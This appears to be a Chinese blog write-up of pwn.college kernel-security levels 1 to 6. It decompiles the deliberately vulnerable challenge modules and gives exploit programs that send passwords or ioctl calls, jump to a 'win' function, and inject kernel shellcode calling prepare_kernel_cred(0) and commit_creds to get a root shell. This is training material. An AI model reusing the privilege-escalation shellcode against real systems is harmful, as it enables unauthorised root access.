After text#

这个是我正式开始的kernel pwn练习题，地址：pwncollege

首先简单的说明一下怎么从pwncollege上下载ko模块文件，我们需要切换成将左下角的Terminal切换成Code，然后打开文件夹/challege/这里就是我们的模块文件所在的地方了，我们只需要右键Download下来即可

如果需要使用它的vm环境，就需要在他的终端上使用vm connect,这样就会连接到远程的vm环境，更多选项可以使用vm --help

level1.0&&leave1.1#

使用ida打开，首先查看init_module

1
int __cdecl init_module()
2
{
3
  __int64 v0; // rbp
4

5
  v0 = filp_open("/flag", 0, 0);
6
  memset(flag, 0, sizeof(flag));
7
  kernel_read(v0, flag, 128, v0 + 104);
8
  filp_close(v0, 0);
9
  proc_entry = (proc_dir_entry *)proc_create("pwncollege", 438, 0, &fops);
10
  printk(&unk_8E1);
11
  printk(&unk_6E0);
12
  printk(&unk_8E1);
13
  printk(&unk_710);
14
  printk(&unk_778);
15
  printk(&unk_7D8);
16
  printk(&unk_828);
17
  printk(&unk_8E8);
18
  return 0;
19
}

可以看到是打开/flag这个文件，然后将读入v0这个变量，使用proc_create创建一个pwncollege文件来交互，双击&fops查看交互接口是device_write

1
.data:0000000000000AA0 fops            file_operations <0, 0, offset device_read, offset device_write, 0, 0, \
2
.data:0000000000000AA0                                         ; DATA XREF: init_module+4A↑o
3
.data:0000000000000AA0                                  0, 0, 0, 0, 0, 0, 0, 0, offset device_open, 0, \
4
.data:0000000000000AA0                                  offset device_release, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \
5
.data:0000000000000AA0                                  0, 0, 0, 0, 0>

所以，当我们向/proc/pwncollege这个文件写入的时候，就会调用‘device_write’这个函数，

1
ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
2
{
3
  size_t v5; // rdx
4
  char password[16]; // [rsp+0h] [rbp-28h] BYREF
5
  unsigned __int64 v8; // [rsp+10h] [rbp-18h]
6

7
  v8 = __readgsqword(0x28u);
8
  printk(&unk_660);
9
  v5 = 16;
10
  if ( length <= 0x10 )
11
    v5 = length;
12
  copy_from_user(password, buffer, v5);
13
  device_state[0] = (strncmp(password, "gyvcbzlksuywlujh", 0x10u) == 0) + 1;
14
  return length;
15
}

在这里可以看到一个很明显的密码判断。只需要我们输入一致，就会使得device_state[0]为2，而当我们使device_state[0]为2之后再次执行cat /proc/college就会去执行device_read从而把flag打印出来

1
ssize_t __fastcall device_read(file *file, char *buffer, size_t length, loff_t *offset)
2
{
3
  const char *v6; // rsi
4
  size_t v7; // rdx
5
  unsigned __int64 v8; // rax
6

7
  printk(&unk_6A0);
8
  v6 = flag;
9
  if ( device_state[0] != 2 )
10
  {
11
    v6 = "device error: unknown state\n";
12
    if ( device_state[0] <= 2 )
13
    {
14
      v6 = "password:\n";
15
      if ( device_state[0] )
16
      {
17
        v6 = "device error: unknown state\n";
18
        if ( device_state[0] == 1 )
19
        {
20
          device_state[0] = 0;
21
          v6 = "invalid password\n";
22
        }
23
      }
24
    }
25
  }
26
  v7 = length;
27
  v8 = strlen(v6) + 1;
28
  if ( v8 - 1 <= length )
29
    v7 = v8 - 1;
30
  return v8 - 1 - copy_to_user(buffer, v6, v7);
31
}

所以，我们只需要输入正确的密码，然后‘cat /proc/pwncollege’就可以得到flag

exp

在远程vm环境运行即可拿到flag

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <fcntl.h>
4
#include <unistd.h>
5
#include <string.h>
6

7
#define get_Flag_Path  "/proc/pwncollege"
8

9
int main (){
10
        char * Passwd = "gyvcbzlksuywlujh";
11
        int fd = open(get_Flag_Path,O_WRONLY);
12
       if (fd<0){
13
        printf("OPEN ERROR check you File !!!\n And you fd is %d\n",fd);
14
       }
15
      if (write(fd,Passwd,strlen(Passwd))>0){
16
          printf("Fd is %d,You Are Win",fd);
17
      }
18
        close(fd);
19
        return EXIT_SUCCESS;
20
}

leave1.1也是一样的解法

leave2.0&&leave2.1#

先看程序一样的：

1
int __cdecl init_module()
2
{
3
  __int64 v0; // rbp
4

5
  v0 = filp_open("/flag", 0, 0);
6
  memset(flag, 0, sizeof(flag));
7
  kernel_read(v0, flag, 128, v0 + 104);
8
  filp_close(v0, 0);
9
  proc_entry = (proc_dir_entry *)proc_create("pwncollege", 438, 0, &fops);
10
  printk(&unk_79C);
11
  printk(&unk_5D8);
12
  printk(&unk_79C);
13
  printk(&unk_608);
14
  printk(&unk_670);
15
  printk(&unk_6D0);
16
  printk(&unk_718);
17
  printk(&unk_7A3);
18
  return 0;
19
}
20
.data:0000000000000920 fops            file_operations <0, 0, 0, offset device_write, 0, 0, 0, 0, 0, 0, 0, 0,\
21
.data:0000000000000920                                         ; DATA XREF: init_module+4A↑o
22
.data:0000000000000920                                  0, 0, offset device_open, 0, offset device_release, \
23
.data:0000000000000920                                  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0>
24
.data:0000000000000920 _data           ends

可以看到会调用device_write.那么接下来查看device_write

1
ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
2
{
3
  size_t v5; // rdx
4
  char password[16]; // [rsp+0h] [rbp-28h] BYREF
5
  unsigned __int64 v8; // [rsp+10h] [rbp-18h]
6

7
  v8 = __readgsqword(0x28u);
8
  printk(&unk_598);
9
  v5 = 16;
10
  if ( length <= 0x10 )
11
    v5 = length;
12
  copy_from_user(password, buffer, v5);
13
  if ( !strncmp(password, "kfjplhjtylqmntng", 0x10u) )
14
    printk(&format); //printk == printf 不过是打印在日志里面
15
  return length;
16
}

这里ida出现了问题，没有把2参放出来，查看汇编如下

1
.rodata.str1.1:0000000000000778 format          db    1                 ; DATA XREF: device_write+6C↑o
2
.rodata.str1.1:0000000000000779                 db  36h ; 6
3
.rodata.str1.1:000000000000077A                 db  54h ; T
4
.rodata.str1.1:000000000000077B                 db  68h ; h
5
.rodata.str1.1:000000000000077C                 db  65h ; e
6
.rodata.str1.1:000000000000077D                 db  20h
7
.rodata.str1.1:000000000000077E                 db  66h ; f
8
.rodata.str1.1:000000000000077F                 db  6Ch ; l
9
.rodata.str1.1:0000000000000780                 db  61h ; a
10
.rodata.str1.1:0000000000000781                 db  67h ; g
11
.rodata.str1.1:0000000000000782                 db  20h
12
.rodata.str1.1:0000000000000783                 db  69h ; i
13
.rodata.str1.1:0000000000000784                 db  73h ; s
14
.rodata.str1.1:0000000000000785                 db  3Ah ; :
15
.rodata.str1.1:0000000000000786                 db  20h
16
.rodata.str1.1:0000000000000787                 db  25h ; %
17
.rodata.str1.1:0000000000000788                 db  73h ; s
18
.rodata.str1.1:0000000000000789                 db  0Ah
19

20
================================================================================================================
21
.text.unlikely:0000000000000511                 mov     rsi, offset flag
22
.text.unlikely:0000000000000518                 mov     rdi, offset format ; 可以看到，会把flag当成二参打印出来
23
.text.unlikely:000000000000051F                 call    printk          ; PIC mode

exp

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <fcntl.h>
4
#include <unistd.h>
5
#include <string.h>
6

7
#define get_Flag_Path  "/proc/pwncollege"
8

9
int main (){
10
        char * Passwd = "kfjplhjtylqmntng";
11
        int fd = open(get_Flag_Path,O_WRONLY);
12
       if (fd<0){
13
        printf("OPEN ERROR check you File !!!\n And you fd is %d\n",fd);
14
       }
15
      if (write(fd,Passwd,strlen(Passwd))>0){
16
          printf("Fd is %d,You Are Win",fd);
17
      }
18
        close(fd);
19
        return EXIT_SUCCESS;
20
}
21
// 最后dmesg | tail -n 20,可以看到flag

leave3.0&&leave3.1#

分析代码：

1
int __cdecl init_module()
2
{
3
  proc_entry = (proc_dir_entry *)proc_create("pwncollege", 438, 0, &fops);
4
  printk(&unk_1041);
5
  printk(&unk_E78);
6
  printk(&unk_1041);
7
  printk(&unk_EA8);
8
  printk(&unk_F10);
9
  printk(&unk_F70);
10
  printk(&unk_FB8);
11
  printk(&unk_1048);
12
  return 0;
13
}
14
.data:00000000000011A0 fops            file_operations <0, 0, 0, offset device_write, 0, 0, 0, 0, 0, 0, 0, 0,\
15
.data:00000000000011A0                                         ; DATA XREF: init_module↑o
16
.data:00000000000011A0                                  0, 0, offset device_open, 0, offset device_release, \
17
.data:00000000000011A0                                  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0>

1
ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
2
{
3
  size_t v5; // rdx
4
  char password[16]; // [rsp+0h] [rbp-28h] BYREF
5
  unsigned __int64 v8; // [rsp+10h] [rbp-18h]
6

7
  v8 = __readgsqword(0x28u);
8
  printk(&unk_E38);
9
  v5 = 16;
10
  if ( length <= 0x10 )
11
    v5 = length;
12
  copy_from_user(password, buffer, v5);
13
  if ( !strncmp(password, "sfvzlmiqphywsyfk", 0x10u) )
14
    win();
15
  return length;
16
}

1
void __cdecl win()
2
{
3
  __int64 v0; // rax
4

5
  printk(&unk_DF8);
6
  v0 = prepare_kernel_cred(0);
7
  commit_creds(v0);      //值得注意的 是这两行代码 会提权，提升至root权限
8
}

所以其实很简单了，

我们只要输入密码，就会正常的进入win,使得我们的权限提升至root,从而可以拿到flag

exp

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <fcntl.h>
4
#include <unistd.h>
5
#include <string.h>
6

7
#define get_Flag_Path  "/proc/pwncollege"
8

9
int main (){
10
        char * Passwd = "sfvzlmiqphywsyfk";
11
        int fd = open(get_Flag_Path,O_WRONLY);
12
       if (fd<0){
13
        printf("OPEN ERROR check you File !!!\n And you fd is %d\n",fd);
14
       }
15
      if (write(fd,Passwd,strlen(Passwd))>0){
16
          printf("Fd is %d,You Are Win",fd);
17
      }
18
        system("cat /flag");
19
        close(fd);
20
        return EXIT_SUCCESS;
21
}

leave3.1同理

leave4.0&&leave4.1#

1
int __cdecl init_module()
2
{
3
  proc_entry = (proc_dir_entry *)proc_create("pwncollege", 438, 0, &fops);
4
  printk(&unk_531);
5
  printk(&unk_328);
6
  printk(&unk_531);
7
  printk(&unk_358);
8
  printk(&unk_3C0);
9
  printk(&unk_420);
10
  printk(&unk_460);
11
  printk(&unk_4A8);
12
  printk(&unk_538);
13
  return 0;
14
}

1
0000680 fops            file_operations <0, 0, 0, 0, 0, 0, 0, 0, 0, 0, offset device_ioctl, 0,\
2
.data:0000000000000680                                         ; DATA XREF: init_module↑o
3
.data:0000000000000680                                  0, 0, offset device_open, 0, offset device_release, \
4
.data:0000000000000680                                  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0>

可以看到会调用device_ioctl，

1
__int64 __fastcall device_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
2
{
3
  __int64 result; // rax
4
  int v5; // r8d
5
  char password[16]; // [rsp+0h] [rbp-28h] BYREF
6
  unsigned __int64 v7; // [rsp+10h] [rbp-18h]
7

8
  v7 = __readgsqword(0x28u);
9
  printk(&unk_2F8);
10
  result = -1;
11
  if ( cmd == 1337 )
12
  {
13
    copy_from_user(password, arg, 16);
14
    v5 = strncmp(password, "czmepuekljhzwqou", 0x10u);
15
    result = 0;
16
    if ( !v5 )
17
    {
18
      win();
19
      return 0;
20
    }
21
  }
22
  return result;
23
}

简单介绍一下ioctl函数

ioctl 是一个专用于设备输入输出操作的一个系统调用，其调用方式如下：

1
int ioctl(int fd, unsigned long request, ...)

其第一个参数为打开设备 (open) 返回的文件描述符，第二个参数为用户程序对设备的控制命令，再后边的参数则是一些补充参数，与设备有关。

对于一个提供了 ioctl 通信方式的设备而言，我们可以通过其文件描述符、使用不同的请求码及其他请求参数通过 ioctl 系统调用完成不同的对设备的 I/O 操作。

而在这里要求了cmd是1337：之后就会触发比较，密码True就会进入win；

所以，很简单了： exp

1
#include <fcntl.h>
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <sys/ioctl.h>
5
#include <unistd.h>
6

7
#define file_Path "/proc/pwncollege"
8
#define CMD 1337
9
#define Passwd "czmepuekljhzwqou"
10
int main() {
11
  int fd = open(file_Path, O_RDONLY);
12
  if (fd<0) {
13
    puts("File is Error! plase choose true file-path!");
14
  }
15
  ioctl(fd, CMD,Passwd);
16
  system("/bin/sh");
17
  close(fd);
18
  return 0;
19
}

leave4.1同上

leave5.0&&leave5.1#

1
int __cdecl init_module()
2
{
3
  proc_entry = (proc_dir_entry *)proc_create("pwncollege", 438, 0, &fops);
4
  printk(&unk_C5B);
5
  printk(&unk_A08);
6
  printk(&unk_C5B);
7
  printk(&unk_A38);
8
  printk(&unk_AA0);
9
  printk(&unk_B00);
10
  printk(&unk_B40);
11
  printk(&unk_B88);
12
  printk(&unk_BF8);
13
  printk(&unk_C62);
14
  return 0;
15
}

1
.data:0000000000000DA0 fops            file_operations <0, 0, 0, 0, 0, 0, 0, 0, 0, 0, offset device_ioctl, 0,\
2
.data:0000000000000DA0                                         ; DATA XREF: init_module↑o
3
.data:0000000000000DA0                                  0, 0, offset device_open, 0, offset device_release, \
4
.data:0000000000000DA0                                  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0>

1
__int64 __fastcall device_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
2
{
3
  __int64 result; // rax
4

5
  printk(&unk_998);
6
  result = -1;
7
  if ( cmd == 1337 )
8
  {
9
    ((void (__fastcall *)(void *, file *))arg)(&unk_998, file); // 这里其实需要解释一下，arg是第三个参数，会把第三个参数当成函数地址去解析
10
    return 0;
11
  }
12
  return result;
13
}

1
void __cdecl win()
2
{
3
  __int64 v0; // rax
4

5
  printk(&unk_9C8);
6
  v0 = prepare_kernel_cred(0);
7
  commit_creds(v0);
8
}

也就是说，只要我们把ioctl的第三个参数布置成win的地址，就可以完成getshell

但是win的地址我们怎么获得呢？这个涉及到内核的保护，其中有一个类似于用户态的保护aslr---> kaslr，这个保护的作用就是地址随机化，会把地址随机映射到一段空间，

当然目前的是没有kaslr的，也就是nokaslr，而我们需要cat /proc/kallsyms就可以看到地址了，不过我们需要root权限，如果你使用的是pwncollege的终端里面的vm,那么你需要在右下角将这个点击一下，使其处于开锁的图标状态;;;!!!!!!!切记，如果需要远程的flag,就需要把它切换成锁住的状态，但是这样无法使用sudo

从而可以使用sudo su,如图

1
root@vm_practice~kernel-security~level5-0:/home/hacker# cat /proc/kallsyms | grep win
2
ffffffff81050a70 T unwind_next_frame
3
ffffffff81051000 T __unwind_start
4
ffffffff81051220 T unwind_get_return_address
5
ffffffff81051250 T unwind_module_init
6
ffffffff81051300 T unwind_get_return_address_ptr
7
ffffffff81051327 t unwind_next_frame.cold
8
ffffffff810b3a30 T kmsg_dump_rewind
9
ffffffff810b6980 T kmsg_dump_rewind_nolock
10
ffffffff813bc350 t zlib_updatewindow
11
ffffffff813be740 t fill_window
12
ffffffff813e12d0 T pci_disable_bridge_window
13
ffffffff813e2da0 t extend_bridge_window.isra.0.part.0
14
ffffffff813e3a50 W pcibios_window_alignment
15
ffffffff81406410 t con2fb_acquire_newinfo
16
ffffffff8140cc60 T acpi_osi_is_win8
17
ffffffff81488f90 t hvc_set_winsz
18
ffffffff814aaed0 T iommu_domain_window_enable
19
ffffffff814aaef0 T iommu_domain_window_disable
20
ffffffff81543fc0 t __unwind_incomplete_requests
21
ffffffff81546980 T execlists_unwind_incomplete_requests
22
ffffffff815c6930 t dsi_program_swing_and_deemphasis
23
ffffffff815c6fa0 t gen11_dsi_voltage_swing_program_seq
24
ffffffff815cc7c0 t icl_ddi_combo_vswing_program
25
ffffffff815cca90 t icl_combo_phy_ddi_vswing_sequence
26
ffffffff815cd0b0 t cnl_ddi_vswing_program.isra.0
27
ffffffff815cd500 t cnl_ddi_vswing_sequence
28
ffffffff815cdd90 t icl_ddi_vswing_sequence
29
ffffffff815ce350 t bxt_ddi_vswing_sequence.isra.0
30
ffffffff81701a40 T pcmcia_release_window
31
ffffffff81701e20 T pcmcia_request_window
32
ffffffff81806bd0 t snd_pcm_rewind.part.0
33
ffffffff8182d430 t twinhead_reserve_killing_zone
34
ffffffff8182d6a7 t twinhead_reserve_killing_zone.cold
35
ffffffff81883db0 t tx_window_errors_show
36
ffffffff818e0600 t tcp_grow_window.isra.0
37
ffffffff818e9820 T tcp_select_initial_window
38
ffffffff818eb090 T __tcp_select_window
39
ffffffff818ef200 T tcp_send_window_probe
40
ffffffff818f58c0 T tcp_openreq_init_rwin
41
ffffffff819c5e50 t xprt_iter_no_rewind
42
ffffffff819c5e60 t xprt_iter_default_rewind
43
ffffffff81aa43b0 t minmax_subwin_update
44
ffffffff81c01480 T rewind_stack_do_exit
45
ffffffff82e66683 T unwind_init
46
ffffffff82e90e40 t __acpi_osi_setup_darwin
47
ffffffff82e90f4b t dmi_disable_osi_win8
48
ffffffff82e90f6a t dmi_disable_osi_win7
49
ffffffffc000092d t win  [challenge]                          ; 可以看到这里是win的地址

所以，我们的exp如下：

1
#include <fcntl.h>
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <sys/ioctl.h>
5
#include <unistd.h>
6

7
#define file_Path "/proc/pwncollege"
8
#define CMD 1337
9
#define win_Addr 0xffffffffc000092d
10
int main() {
11
  int fd = open(file_Path, O_RDONLY);
12
  if (fd<0) {
13
    puts("File is Error! plase choose true file-path!");
14
  }
15
  ioctl(fd, CMD,win_Addr);
16
  system("/bin/sh");
17
  close(fd);
18
  return 0;
19
}

leave5.1同上

leave6.0&&leave6.1#

可以看到，首先创建了一块堆内存，用于存放shellcode,并且有可执行，可写的权限

1
int __cdecl init_module()
2
{
3
  shellcode = (unsigned __int8 *)_vmalloc(4096, 3264, _default_kernel_pte_mask & 0x163);
4
  proc_entry = (proc_dir_entry *)proc_create("pwncollege", 438, 0, &fops);
5
  printk(&unk_B6E);
6
  printk(&unk_9C8);
7
  printk(&unk_B6E);
8
  printk(&unk_9F8);
9
  printk(&unk_A60);
10
  printk(&unk_AC0);
11
  printk(&unk_B08);
12
  printk(&unk_B75);
13
  return 0;
14
}

1
.data:0000000000000CC0 fops            file_operations <0, 0, 0, offset device_write, 0, 0, 0, 0, 0, 0, 0, 0,\
2
.data:0000000000000CC0                                         ; DATA XREF: init_module+1C↑o
3
.data:0000000000000CC0                                  0, 0, offset device_open, 0, offset device_release, \
4
.data:0000000000000CC0                                  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0>

1
ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
2
{
3
  size_t v5; // rdx
4
  __int64 v6; // rbp
5

6
  printk(&unk_988);
7
  v5 = 4096;
8
  if ( length <= 0x1000 )
9
    v5 = length;
10
  v6 = copy_from_user(shellcode, buffer, v5);
11
  ((void (*)(void))shellcode)();
12
  return length - v6;
13
}

这里会写入shellcode到shellcode里面，然后去执行shellcode

所以我们需要写一段shellcode进去： exp

1
#include <axium/axium.h>
2
#include <fcntl.h>
3
#include <stdio.h>
4

5
/* clang-format off */
6
DEFINE_SHELLCODE(shellcode) {
7
  /* 6.0
8
   prepare_kernel_cred ==  0xffffffff81089660
9
   commit_creds == 0xffffffff81089310
10
   */
11

12
  /* 6.1
13
   * commit_creds == 0xffffffff81089310
14
   * prepare_kernel_cred == 0xffffffff81089660
15
   * */
16
  SHELLCODE_START(shellcode);
17
  __asm__ volatile(
18
    "xor rdi,rdi\n"
19
    "mov rax, 0xffffffff81089660\n"
20
    "call rax\n"
21

22
    "mov rdi,rax\n"
23
    "mov rax,0xffffffff81089310\n"
24
    "call rax\n"
25
    "ret\n"
26
  );
27

28
  SHELLCODE_END(shellcode);
29
}
30
/* clang-format on */
31

32
int main() {
33
  set_log_level(DEBUG);
34

35
  payload_t payload;
36
  payload_init(&payload);
37
  PAYLOAD_PUSH_SC(&payload, shellcode);
38
  //  hexdump(payload.data, payload.size, NULL);
39

40
  int fd = open("/proc/pwncollege", O_RDWR);
41
  int ret = write(fd, payload.data, payload.size);
42
  printf("Open Fd is %d,and Write ret is %d\n", fd, ret);
43
  system("/bin/sh");
44
  close(fd);
45
  payload_fini(&payload);
46
  return 0;
47
}

emmm,

1
    "xor rdi,rdi\n"
2
    "mov rax, 0xffffffff81089660\n"
3
    "call rax\n"
4

5
    "mov rdi,rax\n"
6
    "mov rax,0xffffffff81089310\n"
7
    "call rax\n"
8
    "ret\n"

这一段是提权的shellcode ，实际上使用的是

1
  v0 = prepare_kernel_cred(0);
2
  commit_creds(v0);

然后shellcode的框架是Cu写的axium可以去看看，用着还可以

leave6.1同上